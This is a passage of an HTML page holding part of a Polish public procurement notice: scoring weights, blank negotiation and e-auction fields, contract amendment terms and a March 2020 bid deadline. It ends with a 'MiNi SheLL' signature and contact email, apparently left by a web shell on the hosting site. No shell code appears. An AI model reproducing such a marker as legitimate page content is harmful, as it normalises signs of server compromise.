collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin realizacji zamówienia złożonego telefonicznie, faksem lub drogą elektroniczną (nie dłuższy niż 3 dni od dnia złożenia zamówienia) </TD><TD style='border: 1px solid black;border-collapse: collapse;'>15,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin ważności (nie krótszy niż 12 i nie dłuższy niż 18 miesięcy licząc od dnia dostarczenia do siedziby Zamawiającego)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>25,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje dokonanie zmian postanowień treści zawartej umowy w przypadku zaistnienia okoliczności określonych w §11 ust. 2 umowy.Dopuszcza się zmianę istotnych postanowień i warunków umowy wynikającą ze zmiany przepisów prawa, w tym spowodowaną:a)	zmianą ceny, o których mowa w § 4 umowy, spowodowaną urzędową zmianą stawki podatku VAT (zmiana cen jednostkowych uwzględniających zmienioną stawkę obowiązywać będzie po wejściu zmienionej stawki w życie),b)	aktualizacją danych sprzedawcy i kupującego poprzez: zmianę nazwy, zmianę adresu siedziby, zmianę formy prawnej itp.,c)	uzasadnionymi przyczynami technicznymi lub funkcjonalnymi powodującymi konieczność zmiany sposobu wykonania umowy.d)	Zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.3. Warunkiem dokonania zmian, o których mowa w ust. 2 jest niezwłoczne zawiadomienie strony o zaistniałych okolicznościach oraz złożenie na piśmie wniosku zawierającego:a) opis i wyjaśnienie okoliczności, której zmiany dotyczą,b) propozycję zmiany,c) ocena przez kupującego proponowanych zmian,d) podpisanie aneksu do umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-03-16</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">08:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com